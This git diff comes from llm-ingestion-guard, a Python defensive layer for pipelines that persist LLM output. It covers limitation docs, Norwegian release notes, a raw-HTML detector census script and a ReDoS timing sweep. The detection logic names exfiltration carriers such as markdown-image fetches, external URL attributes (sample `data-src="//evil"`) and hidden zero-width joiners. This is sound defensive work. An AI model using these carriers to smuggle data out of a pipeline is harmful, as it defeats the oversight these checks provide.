overlooked.
|
1.x, not deferred.** That channel changes `Finding` and `Severity`, which is a
|
||||||
|
`2.0.0` change under the version contract, so 1.x ships with the coupling intact
|
||||||
|
by decision rather than by omission. A caller that needs the capability
|
||||||
|
separately from the grade must read the finding `id` — `active:markdown-image`
|
||||||
|
names the outward fetch whatever severity it carries — and must not infer
|
||||||
|
"nothing was seen" from a low `Severity`.
|
||||||
|
|
||||||
|
- **Under the default action map the assessment axis carries exactly one judgement
|
||||||
|
the disposition does not.** `DEFAULT_ACTION_MAP` sends `NONE` and `LOW` to `WARN`,
|
||||||
|
`ELEVATED` to `QUARANTINE_REVIEW` and `SEVERE` to `FAIL_SECURE` — the last two 1:1.
|
||||||
|
So for any document that carries a finding at all, `assessment` is a relabelling of
|
||||||
|
`disposition` and nothing more; the only thing it adds is *clean* versus *findings
|
||||||
|
present, none dispositive in this context*, which 0.4.0 rendered identically. That
|
||||||
|
collapse is the point (the map is what keeps the separation additive, so a caller
|
||||||
|
ignoring the new axis sees no change), and it is also the limitation: reading
|
||||||
|
`assessment` buys a consumer nothing until it supplies its own `action_map` or needs
|
||||||
|
the clean/low distinction. **The second consequence is on this document.** The
|
||||||
|
published false-positive rates are counts of documents *disposed non-WARN*, and they
|
||||||
|
are a statement about assessed risk only while `NONE` + `LOW` are exactly the WARN
|
||||||
|
pre-image. `tests/test_corpus.py::test_the_published_fp_metric_is_a_risk_statement`
|
||||||
|
pins that equivalence — but it pins it for `DEFAULT_ACTION_MAP`. A caller running its
|
||||||
|
own map makes "disposed non-WARN" a different claim from the one measured here, with
|
||||||
|
nothing in either repo failing to say so.
|
||||||
|
|
||||||
- **A ZWJ hidden between two emoji is exempt, and ZWNJ's own false-positive
|
- **A ZWJ hidden between two emoji is exempt, and ZWNJ's own false-positive
|
||||||
class is untouched.** U+200D composes emoji (👩💻 is WOMAN + ZWJ + PERSONAL
|
class is untouched.** U+200D composes emoji (👩💻 is WOMAN + ZWJ + PERSONAL
|
||||||
|
|
@ -498,6 +746,22 @@ fails the test, forcing this doc to be updated:
|
||||||
not pictographic) and no corpus is available here to verify it against, so it
|
not pictographic) and no corpus is available here to verify it against, so it
|
||||||
is parked as a known false-positive class rather than guessed at.
|
is parked as a known false-positive class rather than guessed at.
|
||||||
|
|
||||||
|
- **That context test is one predicate on two surfaces, and the symbol carrying it is
|
||||||
|
private.** `sanitize` owns `_is_joiner_in_emoji_sequence`; `output` imports it
|
||||||
|
(`output.py:74`) instead of restating it, because the same defect had to be fixed on
|
||||||
|
both surfaces and a split would let the input side stop flagging while the output
|
||||||
|
side kept hard-blocking — or the reverse, which is how a carrier reaches a persisted
|
||||||
|
artifact after passing the input gate. The agreement is pinned by
|
||||||
|
`tests/test_output.py::test_output_zwj_narrowing_matches_the_sanitize_side`, which
|
||||||
|
asserts `stripped == flagged` across six shapes — half-context on either side, a
|
||||||
|
leading and a trailing joiner, one genuine in-sequence joiner, and a word split.
|
||||||
|
Two things that pin does not give. The six shapes are hand-written rather than
|
||||||
|
drawn from a corpus, so everywhere outside them
|
||||||
|
the surfaces agree by *shared implementation*, not by test — which is the stronger
|
||||||
|
guarantee only for as long as the import survives. And the leading underscore means
|
||||||
|
the predicate is **not** part of the surface frozen under semver: a consumer that
|
||||||
|
imports it is pinning a private name 1.x makes no promise about.
|
||||||
|
|
||||||
## Out-of-scope (documented boundary)
|
## Out-of-scope (documented boundary)
|
||||||
|
|
||||||
Embedding/vector-layer defenses (OWASP LLM08, downstream of persist); multimodal
|
Embedding/vector-layer defenses (OWASP LLM08, downstream of persist); multimodal
|
||||||
|
|
|
||||||
|
|
@ -228,7 +228,18 @@ Nøkkelantakelser (+ test) · Verifisering. Testkommando alltid:
|
||||||
→ +N grønne; `python -c "import tomllib,pathlib; d=tomllib.loads(pathlib.Path('pyproject.toml').read_text()); assert d['project']['dependencies']==[] and 'pypdf' in ' '.join(d['project']['optional-dependencies']['dev'])"` → exit 0.
|
→ +N grønne; `python -c "import tomllib,pathlib; d=tomllib.loads(pathlib.Path('pyproject.toml').read_text()); assert d['project']['dependencies']==[] and 'pypdf' in ' '.join(d['project']['optional-dependencies']['dev'])"` → exit 0.
|
||||||
- **Avhengigheter:** uavhengig; kan gjøres når som helst før G.
|
- **Avhengigheter:** uavhengig; kan gjøres når som helst før G.
|
||||||
|
|
||||||
### Session G — v1.0 freeze + release *(FRYSER Python-surfacen — Node-prereq)*
|
### Session G — v1.0 freeze + release *(LANDET 2026-08-13)*
|
||||||
|
|
||||||
|
> **LANDET — `98ebc07`, tag `v1.0.0` pushet.** D1–D6 i `docs/GATE-G-v1.md` §6 tatt av
|
||||||
|
> operatøren: frys på 0.7.0 (D2 i), `:492`/`:460`/`:88` konsedert i 1.x (D3/D5,
|
||||||
|
> `e9d8fb2`), varslingsplikten fyrte ikke (D4 — begrunnelse over ved løfte 1),
|
||||||
|
> `active_tag_class` er IKKE en pinnbar shape (D6). **Åtte flater bumpet for hånd;
|
||||||
|
> den niende — Forge-beskrivelsen — ble VERIFISERT mot API-et og trengte ingen
|
||||||
|
> endring** (178 kodepunkter, ingen versjon, ingen «alpha»). Klassifiseringssveipet
|
||||||
|
> (421 treff) og `git show 98ebc07:README.md` kjørte begge FØR taggen, i den
|
||||||
|
> rekkefølgen; anonym `pip install …@v1.0.0` i rent venv etter. Sveipet fant to
|
||||||
|
> flater lista under ikke navnga: READMEs status-**badge** og ADOPTION-BRIEFs
|
||||||
|
> testtall (`791` mot 792). 792 tester, 129/129, 6/6.
|
||||||
|
|
||||||
- **Mål:** shippe v1.0.0; fryse den offentlige surfacen som porten oversetter.
|
- **Mål:** shippe v1.0.0; fryse den offentlige surfacen som porten oversetter.
|
||||||
- **Scope-grense:** ingen ny feature. Kun versjons-bump, CHANGELOG, tag, push.
|
- **Scope-grense:** ingen ny feature. Kun versjons-bump, CHANGELOG, tag, push.
|
||||||
|
|
@ -428,6 +439,18 @@ ikke en preferanse.**
|
||||||
og bygger på 0.3.1-formen; en stille re-stramming lander som produksjonsincident hos
|
og bygger på 0.3.1-formen; en stille re-stramming lander som produksjonsincident hos
|
||||||
dem, ikke som en release-note. Gjelder også 0.4.0: akse-separasjonen skal endre
|
dem, ikke som en release-note. Gjelder også 0.4.0: akse-separasjonen skal endre
|
||||||
DISPOSISJON, ikke graderingen — viser det seg feil under scoping, fyrer løftet.
|
DISPOSISJON, ikke graderingen — viser det seg feil under scoping, fyrer løftet.
|
||||||
|
> **D4, avgjort av operatøren 2026-08-13 ved v1.0-frysen: løftet fyrte IKKE av
|
||||||
|
> rå-HTML-bevegelsen 0.3.1→0.7.0, og intet etterskuddsvarsel gikk ut.**
|
||||||
|
> Begrunnelsen styrer, ikke ordlyden. Løftets formål er navngitt i teksten over:
|
||||||
|
> en stille re-**stramming** lander som produksjonsincident hos dem. Alle fire
|
||||||
|
> ordinære markdown-former er målt IDENTISKE 0.3.1 vs 0.7.0 (WARN/LOW, før/etter i
|
||||||
|
> samme økt, `docs/GATE-G-v1.md` §4); de fire radene som flyttet seg LØSNET alle
|
||||||
|
> (`<a href>` HIGH→MEDIUM, `<a aria-label>` og `</a>` HIGH→rent, ZWJ-emoji
|
||||||
|
> HIGH→rent). En løsning kan ikke produsere incidenten løftet finnes for å hindre.
|
||||||
|
> **Ordlyden («enhver endring») pekte motsatt vei, og det er den reelle
|
||||||
|
> motforestillingen** — hadde den styrt, var varselet uteblitt i tre utgivelser.
|
||||||
|
> Nedtegnet her, ikke i `STATE.md`, nettopp av grunnen seksjonen selv oppgir: et
|
||||||
|
> fravær uten begrunnelse er ikke til å skille fra at vi glemte det.
|
||||||
2. **Relativ-mål-asymmetrien** (relative lenker/bilder i en OKF-bundle flagges ikke) —
|
2. **Relativ-mål-asymmetrien** (relative lenker/bilder i en OKF-bundle flagges ikke) —
|
||||||
lukkes den, får `llm-ingestion-okf` varsel **før** det shippes. Den er en Door
|
lukkes den, får `llm-ingestion-okf` varsel **før** det shippes. Den er en Door
|
||||||
C-egenskap, ikke et guard-gap: et merget konsept skrives VERBATIM, så vi reparerer
|
C-egenskap, ikke et guard-gap: et merget konsept skrives VERBATIM, så vi reparerer
|
||||||
|
|
|
||||||
|
|
@ -1,4 +1,4 @@
|
||||||
"""raw-HTML census — which branch of `is_active_tag` fires, and what narrowing it costs.
|
"""raw-HTML census — which branch of `active_tag_class` fires, and what a change costs.
|
||||||
|
|
||||||
`docs/fp-sweep.py` answers *how often* the upload door costs a human. This answers
|
`docs/fp-sweep.py` answers *how often* the upload door costs a human. This answers
|
||||||
*why*, for the one detector that drives most of it, and *what a proposed narrowing
|
*why*, for the one detector that drives most of it, and *what a proposed narrowing
|
||||||
|
|
@ -22,11 +22,17 @@ TWO METHOD TRAPS IT EXISTS TO AVOID:
|
||||||
effect with corpus drift. Every candidate here runs against the same corpus state
|
effect with corpus drift. Every candidate here runs against the same corpus state
|
||||||
in one process, and `base` is re-measured rather than quoted from the doc.
|
in one process, and `base` is re-measured rather than quoted from the doc.
|
||||||
|
|
||||||
The candidates are applied by replacing `active_content.is_active_tag` in-process,
|
The candidates are applied by replacing `active_content.active_tag_class`
|
||||||
which mirrors a real edit to the *scanner*. Since 0.6.0 that is the whole story:
|
in-process, which mirrors a real edit to the *scanner*. Since 0.6.0 that is the
|
||||||
`neutralize` calls its own `is_defangable_tag`, so patching this symbol cannot
|
whole story: `neutralize` calls its own `is_defangable_tag`, so patching this
|
||||||
move the mutator. Before 0.6.0 the two shared one symbol and this caveat read the
|
symbol cannot move the mutator. Before 0.6.0 the two shared one symbol and this
|
||||||
other way. See the raw-HTML bullets in `docs/LIMITATIONS.md`.
|
caveat read the other way. See the raw-HTML bullets in `docs/LIMITATIONS.md`.
|
||||||
|
|
||||||
|
The patch point was `is_active_tag` through 0.6.1, when a candidate could only
|
||||||
|
answer yes/no. 0.7.0 grades raw HTML on carrier as well, so a candidate returns a
|
||||||
|
CLASS and `is_active_tag` became a thin wrapper. A boolean patch point would have
|
||||||
|
left every regrade candidate equal to PRODUCTION — silently, and in the direction
|
||||||
|
that reads as "no change helps".
|
||||||
|
|
||||||
The `PRODUCTION` row is the only one that is not a hypothetical: it leaves the
|
The `PRODUCTION` row is the only one that is not a hypothetical: it leaves the
|
||||||
shipped predicate in place. A shipped narrowing must equal its candidate row, and
|
shipped predicate in place. A shipped narrowing must equal its candidate row, and
|
||||||
|
|
@ -40,7 +46,6 @@ consumer repos and their paths must not reach a public mirror:
|
||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import re
|
|
||||||
import sys
|
import sys
|
||||||
from collections import Counter
|
from collections import Counter
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
|
|
@ -48,50 +53,73 @@ from pathlib import Path
|
||||||
sys.path.insert(0, str(Path(__file__).resolve().parent.parent / "src"))
|
sys.path.insert(0, str(Path(__file__).resolve().parent.parent / "src"))
|
||||||
|
|
||||||
from llm_ingestion_guard import ( # noqa: E402
|
from llm_ingestion_guard import ( # noqa: E402
|
||||||
PRESET_USER_UPLOAD, Disposition, screen_output,
|
PRESET_TRUSTED_SOURCE, PRESET_USER_UPLOAD, Disposition, guard, scan_output,
|
||||||
)
|
)
|
||||||
from llm_ingestion_guard import active_content as ac # noqa: E402
|
from llm_ingestion_guard import active_content as ac # noqa: E402
|
||||||
|
|
||||||
BENIGN = Disposition.WARN
|
BENIGN = Disposition.WARN
|
||||||
|
BLOCKED = Disposition.FAIL_SECURE
|
||||||
# Attribute parser — only needed to read a URL attribute's VALUE, which
|
# Both trust tiers, because a change can move them in OPPOSITE directions: the
|
||||||
# `_URL_ATTR_RE` (a presence test) deliberately does not capture.
|
# carrier split loosens the upload door (HIGH -> MEDIUM is fail_secure ->
|
||||||
_ATTR_KV_RE = re.compile(
|
# quarantine_review) while tightening the trusted one (one finding becomes two,
|
||||||
r"""\b(?P<k>[A-Za-z_:][\w:.\-]*)\s*=\s*(?P<v>"[^"]*"|'[^']*'|[^\s>]+)"""
|
# and >=2 findings at MEDIUM+ trip the compound overlay). A single-preset census
|
||||||
)
|
# would have reported only the half that flattered the change.
|
||||||
_URL_ATTR_NAMES = frozenset({
|
PRESETS = {"upload": PRESET_USER_UPLOAD, "trusted": PRESET_TRUSTED_SOURCE}
|
||||||
"src", "href", "xlink:href", "srcset", "data", "poster", "formaction",
|
# Disposition severity order, for "did this document get strictly worse?".
|
||||||
"action", "background", "cite", "codebase", "longdesc",
|
_TIER = {Disposition.WARN: 0, Disposition.QUARANTINE_REVIEW: 1, Disposition.FAIL_SECURE: 2}
|
||||||
})
|
# The row a release is judged against: what consumers are running today.
|
||||||
|
_SHIPPED_BEFORE_ROW = "A + base-url (0.6.0)"
|
||||||
|
|
||||||
def has_external_url_attr(attrs: str) -> bool:
|
def has_external_url_attr(attrs: str) -> bool:
|
||||||
"""True if any URL-bearing attribute points at an attacker-reachable target."""
|
"""True if any URL-bearing attribute points at an attacker-reachable target.
|
||||||
for m in _ATTR_KV_RE.finditer(attrs):
|
|
||||||
if m.group("k").lower() not in _URL_ATTR_NAMES:
|
Delegates to the shipped reader instead of re-deriving it. This function used
|
||||||
continue
|
to parse attributes itself, and the copy drifted: it read attribute names with
|
||||||
value = m.group("v")
|
its own pattern (so `data-src="//evil"` was invisible to it while
|
||||||
if value[:1] in "\"'":
|
`_URL_ATTR_RE` matched it) and treated a value as one URL (so an external
|
||||||
value = value[1:-1]
|
candidate later in a multi-candidate `srcset` was missed). Both shapes made
|
||||||
if ac._has_external_target(value.strip()):
|
the `A` rows under-count against the PRODUCTION row printed beside them —
|
||||||
return True
|
exactly the drift the PRODUCTION row exists to expose. Pinned by
|
||||||
return False
|
`tests/test_docs_measurement_scripts.py`.
|
||||||
|
"""
|
||||||
|
return ac._url_attr_is_external(attrs)
|
||||||
|
|
||||||
|
|
||||||
def _variant(*, drop: frozenset[str] = frozenset(), external_only: bool = False):
|
def _variant(*, drop: frozenset[str] = frozenset(), external_only: bool = False,
|
||||||
"""Build an `is_active_tag` replacement: names minus ``drop``, URL branch gated."""
|
carrier_split: bool = False, no_url: bool = False):
|
||||||
|
"""Build an `active_tag_class` replacement.
|
||||||
|
|
||||||
|
Candidates return the tag's CLASS (``"raw-html"`` / ``"raw-html-link"``) or
|
||||||
|
``None``, because since 0.7.0 the raw-HTML pass grades on carrier as well as
|
||||||
|
activity, and a boolean could not express a regrade. ``drop`` removes names
|
||||||
|
from the active set, ``external_only`` gates the URL branch, ``carrier_split``
|
||||||
|
moves the click-required carriers to the link class, and ``no_url`` makes a
|
||||||
|
URL-affordance tag carrying no URL attribute inert.
|
||||||
|
"""
|
||||||
keep = frozenset(ac._ACTIVE_TAGS - drop)
|
keep = frozenset(ac._ACTIVE_TAGS - drop)
|
||||||
|
|
||||||
def is_active_tag(name: str, attrs: str) -> bool:
|
def active_tag_class(name: str, attrs: str):
|
||||||
if name.lower() in keep or ac._EVENT_ATTR_RE.search(attrs):
|
lowered = name.lower()
|
||||||
return True
|
if ac._EVENT_ATTR_RE.search(attrs):
|
||||||
if not ac._URL_ATTR_RE.search(attrs):
|
return "raw-html"
|
||||||
return False
|
has_url_attr = bool(ac._URL_ATTR_RE.search(attrs))
|
||||||
return has_external_url_attr(attrs) if external_only else True
|
if lowered in keep:
|
||||||
|
if no_url and lowered in ac._URL_AFFORDANCE_TAGS and not has_url_attr:
|
||||||
|
return None
|
||||||
|
if carrier_split and lowered in ac._LINK_TAGS:
|
||||||
|
return "raw-html-link"
|
||||||
|
return "raw-html"
|
||||||
|
if not has_url_attr:
|
||||||
|
return None
|
||||||
|
if external_only and not has_external_url_attr(attrs):
|
||||||
|
return None
|
||||||
|
return "raw-html"
|
||||||
|
|
||||||
return is_active_tag
|
return active_tag_class
|
||||||
|
|
||||||
|
|
||||||
|
_INERT = None
|
||||||
|
|
||||||
CANDIDATES = [
|
CANDIDATES = [
|
||||||
("pre-0.6.0 (no narrowing)", _variant()),
|
("pre-0.6.0 (no narrowing)", _variant()),
|
||||||
# The URL-attribute branch requires an EXTERNAL target — the rule the markdown
|
# The URL-attribute branch requires an EXTERNAL target — the rule the markdown
|
||||||
|
|
@ -101,14 +129,28 @@ CANDIDATES = [
|
||||||
# which the URL-attribute branch still catches; APIM policy XML's `<base />` is
|
# which the URL-attribute branch still catches; APIM policy XML's `<base />` is
|
||||||
# attribute-less and has no affordance in any renderer.
|
# attribute-less and has no affordance in any renderer.
|
||||||
("base-url: <base> needs a URL", _variant(drop=frozenset({"base"}))),
|
("base-url: <base> needs a URL", _variant(drop=frozenset({"base"}))),
|
||||||
("A + base-url (both)",
|
("A + base-url (0.6.0)",
|
||||||
_variant(drop=frozenset({"base"}), external_only=True)),
|
_variant(drop=frozenset({"base"}), external_only=True)),
|
||||||
# Not a hypothetical: the shipped predicate, unpatched. `A + base-url` is what
|
# 0.7.0's pair. C1 REGRADES (a click-required carrier is MEDIUM, not HIGH);
|
||||||
# 0.6.0 shipped, so these two rows must agree — a mismatch means the code and
|
# D NARROWS (a tag whose whole affordance is a URL it does not carry is
|
||||||
# this script have drifted apart and every number below is suspect.
|
# inert). They are listed alone as well as together because they co-occur
|
||||||
|
# hard: D strips a document's `</a>` and `<Frame>`, and what is left is the
|
||||||
|
# `<a href=...>` C1 grades down, so each alone leaves the document blocked by
|
||||||
|
# the other's residue. Reading either single row as "this change is cheap" is
|
||||||
|
# the trap this script exists to prevent.
|
||||||
|
("C1: carrier split (alone)",
|
||||||
|
_variant(drop=frozenset({"base"}), external_only=True, carrier_split=True)),
|
||||||
|
("D: no-URL narrowing (alone)",
|
||||||
|
_variant(drop=frozenset({"base"}), external_only=True, no_url=True)),
|
||||||
|
("C1 + D (0.7.0)",
|
||||||
|
_variant(drop=frozenset({"base"}), external_only=True,
|
||||||
|
carrier_split=True, no_url=True)),
|
||||||
|
# Not a hypothetical: the shipped predicate, unpatched. `C1 + D` is what 0.7.0
|
||||||
|
# ships, so these two rows must agree — a mismatch means the code and this
|
||||||
|
# script have drifted apart and every number below is suspect.
|
||||||
("PRODUCTION (as shipped)", None),
|
("PRODUCTION (as shipped)", None),
|
||||||
# The CEILING: no narrowing can free more than switching the detector off.
|
# The CEILING: no narrowing can free more than switching the detector off.
|
||||||
("NONE (ceiling)", lambda name, attrs: False),
|
("NONE (ceiling)", lambda name, attrs: _INERT),
|
||||||
]
|
]
|
||||||
|
|
||||||
|
|
||||||
|
|
@ -172,7 +214,7 @@ def main() -> None:
|
||||||
print(__doc__)
|
print(__doc__)
|
||||||
raise SystemExit(2)
|
raise SystemExit(2)
|
||||||
|
|
||||||
original = ac.is_active_tag
|
original = ac.active_tag_class
|
||||||
try:
|
try:
|
||||||
for spec in specs:
|
for spec in specs:
|
||||||
if "=" not in spec:
|
if "=" not in spec:
|
||||||
|
|
@ -187,27 +229,78 @@ def main() -> None:
|
||||||
n = len(texts)
|
n = len(texts)
|
||||||
print(f"\n## {label} — {n} documents", flush=True)
|
print(f"\n## {label} — {n} documents", flush=True)
|
||||||
|
|
||||||
baseline = None
|
base_nonwarn = base_block = None
|
||||||
|
shipped_before: dict[str, list] = {}
|
||||||
for name, fn in CANDIDATES:
|
for name, fn in CANDIDATES:
|
||||||
ac.is_active_tag = original if fn is None else fn
|
ac.active_tag_class = original if fn is None else fn
|
||||||
non_warn = sum(
|
# `screen_output(t, policy)` IS `guard(lambda: scan_output(t),
|
||||||
1 for t in texts
|
# policy)`. Decomposed by exactly one step here so the scan — the
|
||||||
if screen_output(t, PRESET_USER_UPLOAD).disposition is not BENIGN
|
# expensive part, and identical across trust tiers — runs once per
|
||||||
)
|
# document instead of once per tier. Disposition still goes through
|
||||||
if baseline is None:
|
# the shipped `guard`, so the fail-closed wrapper is not skipped.
|
||||||
baseline = non_warn
|
per_preset = {tier: [] for tier in PRESETS}
|
||||||
print(f" {name:>28}: {non_warn:4d} ({non_warn / n:5.1%})", flush=True)
|
for t in texts:
|
||||||
else:
|
try:
|
||||||
print(f" {name:>28}: {non_warn:4d} ({non_warn / n:5.1%})"
|
report = scan_output(t)
|
||||||
f" frees {baseline - non_warn}", flush=True)
|
except Exception: # noqa: BLE001 — hand it back to `guard`
|
||||||
ac.is_active_tag = original
|
report = None
|
||||||
|
for tier, policy in PRESETS.items():
|
||||||
|
scan_fn = (lambda: scan_output(t)) if report is None \
|
||||||
|
else (lambda report=report: report)
|
||||||
|
per_preset[tier].append(guard(scan_fn, policy).disposition)
|
||||||
|
dispositions = per_preset["upload"]
|
||||||
|
non_warn = sum(1 for d in dispositions if d is not BENIGN)
|
||||||
|
# BOTH metrics, because they answer different questions and a
|
||||||
|
# REGRADE is invisible to the first one. A narrowing removes the
|
||||||
|
# finding, so a document can reach WARN; a carrier split only
|
||||||
|
# lowers the severity, so the document stays non-WARN and merely
|
||||||
|
# stops being hard-failed. Reporting only `non_warn` would have
|
||||||
|
# printed "frees 0" for every carrier candidate and read as
|
||||||
|
# "the split buys nothing" when it converts a hard block into a
|
||||||
|
# human review — the difference a consumer actually feels.
|
||||||
|
blocked = sum(1 for d in dispositions if d is BLOCKED)
|
||||||
|
# Tightening is measured against the row consumers are RUNNING,
|
||||||
|
# not against the pre-0.6.0 baseline the `frees` column subtracts
|
||||||
|
# from. "Did this release make anything worse for someone on the
|
||||||
|
# current version" is a different question from "how much of the
|
||||||
|
# original over-reach is left", and only the first one belongs in
|
||||||
|
# a release note.
|
||||||
|
if name == _SHIPPED_BEFORE_ROW:
|
||||||
|
shipped_before = per_preset
|
||||||
|
if base_nonwarn is None:
|
||||||
|
base_nonwarn, base_block = non_warn, blocked
|
||||||
|
print(f" {name:>28}: non-WARN {non_warn:4d} ({non_warn / n:5.1%})"
|
||||||
|
f" fail_secure {blocked:4d}", flush=True)
|
||||||
|
continue
|
||||||
|
# A candidate is not free just because it frees documents. Splitting
|
||||||
|
# one finding into two puts TWO findings at MEDIUM+ in a document
|
||||||
|
# that had one, which trips the compound overlay — so a change sold
|
||||||
|
# as a loosening can TIGHTEN a document one tier, and on the trusted
|
||||||
|
# preset (where nothing was hard-failed to begin with) that is the
|
||||||
|
# only direction it can move. Reporting `unblocks` without `tightens`
|
||||||
|
# is a one-sided number.
|
||||||
|
row = (f" {name:>28}: non-WARN {non_warn:4d} ({non_warn / n:5.1%})"
|
||||||
|
f" fail_secure {blocked:4d}"
|
||||||
|
f" frees {base_nonwarn - non_warn:3d} / unblocks "
|
||||||
|
f"{base_block - blocked:3d}")
|
||||||
|
if shipped_before:
|
||||||
|
tightened = {
|
||||||
|
tier: sum(1 for before, after
|
||||||
|
in zip(shipped_before[tier], per_preset[tier])
|
||||||
|
if _TIER[after] > _TIER[before])
|
||||||
|
for tier in PRESETS
|
||||||
|
}
|
||||||
|
row += (f" TIGHTENS vs 0.6.0: upload {tightened['upload']:3d}"
|
||||||
|
f" trusted {tightened['trusted']:3d}")
|
||||||
|
print(row, flush=True)
|
||||||
|
ac.active_tag_class = original
|
||||||
|
|
||||||
names, relative, external = branch_census(texts)
|
names, relative, external = branch_census(texts)
|
||||||
print(f" name branch : {dict(names.most_common(8))}")
|
print(f" name branch : {dict(names.most_common(8))}")
|
||||||
print(f" url-attr relative: {dict(relative.most_common(8))} <- A frees these")
|
print(f" url-attr relative: {dict(relative.most_common(8))} <- A frees these")
|
||||||
print(f" url-attr external: {dict(external.most_common(8))} <- A keeps these")
|
print(f" url-attr external: {dict(external.most_common(8))} <- A keeps these")
|
||||||
finally:
|
finally:
|
||||||
ac.is_active_tag = original
|
ac.active_tag_class = original
|
||||||
|
|
||||||
print("\n---")
|
print("\n---")
|
||||||
print("Candidates are measured TOGETHER as well as alone: over-reach classes\n"
|
print("Candidates are measured TOGETHER as well as alone: over-reach classes\n"
|
||||||
|
|
|
||||||
|
|
@ -37,17 +37,30 @@ import importlib
|
||||||
import json
|
import json
|
||||||
import re
|
import re
|
||||||
import sys
|
import sys
|
||||||
import time
|
|
||||||
from dataclasses import dataclass
|
from dataclasses import dataclass
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
|
|
||||||
SRC = Path(__file__).resolve().parent.parent / "src" / "llm_ingestion_guard"
|
ROOT = Path(__file__).resolve().parent.parent
|
||||||
|
SRC = ROOT / "src" / "llm_ingestion_guard"
|
||||||
sys.path.insert(0, str(SRC.parent))
|
sys.path.insert(0, str(SRC.parent))
|
||||||
|
sys.path.insert(0, str(ROOT / "tests"))
|
||||||
|
|
||||||
from llm_ingestion_guard.lexicon import load_lexicon # noqa: E402
|
from llm_ingestion_guard.lexicon import load_lexicon # noqa: E402
|
||||||
|
from redos_clock import scan_seconds # noqa: E402
|
||||||
|
|
||||||
N1, N2 = 4_000, 8_000
|
N1, N2 = 4_000, 8_000
|
||||||
RATIO_FLAG = 2.6
|
RATIO_FLAG = 2.6
|
||||||
|
# RE-DERIVED on the CPU clock, not inherited from the wall clock this script used
|
||||||
|
# through 1.1.0. The clock move fixed false REDS in the suite's bounds; it bought
|
||||||
|
# this sweep no sensitivity. Over twelve full runs (2585 arms each) the median
|
||||||
|
# ratio is 1.95-2.03 in every size bucket above 50 us -- the whole surface
|
||||||
|
# measures linear -- yet two-point excursions past RATIO_FLAG survive at every
|
||||||
|
# magnitude (p99 ratio 2.9-3.3 even above 1 ms). Flagged arms per run by floor:
|
||||||
|
# 6.9 at 0.5 ms, 1.1 at 1.0 ms, 0.33 at 1.5 ms. The knee is here. Four arms
|
||||||
|
# flagged across those twelve runs, each in exactly ONE of them, and six arms
|
||||||
|
# that have ever flagged re-measure at exponent 0.97-1.09 over six doublings.
|
||||||
|
# Descheduling was never what made this sweep noisy -- a two-point ratio is, so
|
||||||
|
# read a clean run and a flagged run with the same suspicion.
|
||||||
NOISE_FLOOR = 0.0015
|
NOISE_FLOOR = 0.0015
|
||||||
HARD_CAP = 20.0
|
HARD_CAP = 20.0
|
||||||
|
|
||||||
|
|
@ -134,21 +147,35 @@ def build(unit: str, n: int) -> str:
|
||||||
|
|
||||||
|
|
||||||
def t(rx: re.Pattern[str], text: str, mode: str = "search") -> float:
|
def t(rx: re.Pattern[str], text: str, mode: str = "search") -> float:
|
||||||
"""Time one scan of ``text`` in the mode the production code actually uses."""
|
"""Time one scan of ``text`` in the mode the production code actually uses.
|
||||||
|
|
||||||
|
On the SAME clock every ReDoS bound in the suite is measured against --
|
||||||
|
``tests/redos_clock.py``, process CPU time -- imported rather than restated
|
||||||
|
here, for the reason that module gives: a blowup is spent cycles, and a
|
||||||
|
loaded machine steals wall clock without adding any. Until 1.1.0 this timed
|
||||||
|
on ``time.monotonic()``, which made the floor below and the cap figure
|
||||||
|
derived from it numbers from a different instrument than the bounds they
|
||||||
|
justify. The closure is built BEFORE the clock starts, so only the scan is
|
||||||
|
charged.
|
||||||
|
"""
|
||||||
mode = mode.rstrip("*")
|
mode = mode.rstrip("*")
|
||||||
start = time.monotonic()
|
|
||||||
if mode == "finditer":
|
if mode == "finditer":
|
||||||
for _ in rx.finditer(text):
|
def scan(s: str) -> None:
|
||||||
pass
|
for _ in rx.finditer(s):
|
||||||
|
pass
|
||||||
elif mode == "sub":
|
elif mode == "sub":
|
||||||
rx.sub("", text)
|
def scan(s: str) -> None:
|
||||||
|
rx.sub("", s)
|
||||||
elif mode == "match":
|
elif mode == "match":
|
||||||
rx.match(text)
|
def scan(s: str) -> None:
|
||||||
|
rx.match(s)
|
||||||
elif mode == "fullmatch":
|
elif mode == "fullmatch":
|
||||||
rx.fullmatch(text)
|
def scan(s: str) -> None:
|
||||||
|
rx.fullmatch(s)
|
||||||
else:
|
else:
|
||||||
rx.search(text)
|
def scan(s: str) -> None:
|
||||||
return time.monotonic() - start
|
rx.search(s)
|
||||||
|
return scan_seconds(scan, text)
|
||||||
|
|
||||||
|
|
||||||
# --- targets ----------------------------------------------------------------
|
# --- targets ----------------------------------------------------------------
|
||||||
|
|
|
||||||
7
llms.txt
Normal file
7
llms.txt
Normal file
|
|
@ -0,0 +1,7 @@
|
||||||
|
# llm-ingestion-guard
|
||||||
|
|
||||||
|
> Write-time defensive layer for Python pipelines that persist LLM output: sanitize, fence, tool-less quarantined transform, capability isolation, scan before persist, fail-secure.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
pip install "llm-ingestion-guard @ git+https://git.fromaitochitta.com/open/llm-ingestion-pipeline-security.git@v1.1.0"
|
||||||
|
```
|
||||||
|
|
@ -4,7 +4,7 @@ build-backend = "hatchling.build"
|
||||||
|
|
||||||
[project]
|
[project]
|
||||||
name = "llm-ingestion-guard"
|
name = "llm-ingestion-guard"
|
||||||
version = "0.6.1"
|
version = "1.2.0"
|
||||||
description = "Write-time defensive layer for Python pipelines that persist LLM output: sanitize, fence, tool-less quarantined transform, capability isolation, scan before persist, fail-secure."
|
description = "Write-time defensive layer for Python pipelines that persist LLM output: sanitize, fence, tool-less quarantined transform, capability isolation, scan before persist, fail-secure."
|
||||||
readme = "README.md"
|
readme = "README.md"
|
||||||
requires-python = ">=3.10"
|
requires-python = ">=3.10"
|
||||||
|
|
@ -12,7 +12,7 @@ license = { file = "LICENSE" }
|
||||||
authors = [{ name = "Kjell Tore Guttormsen" }]
|
authors = [{ name = "Kjell Tore Guttormsen" }]
|
||||||
keywords = ["llm", "security", "prompt-injection", "rag", "ingestion", "guardrails", "write-time"]
|
keywords = ["llm", "security", "prompt-injection", "rag", "ingestion", "guardrails", "write-time"]
|
||||||
classifiers = [
|
classifiers = [
|
||||||
"Development Status :: 3 - Alpha",
|
"Development Status :: 5 - Production/Stable",
|
||||||
"Intended Audience :: Developers",
|
"Intended Audience :: Developers",
|
||||||
"License :: OSI Approved :: MIT License",
|
"License :: OSI Approved :: MIT License",
|
||||||
"Programming Language :: Python :: 3",
|
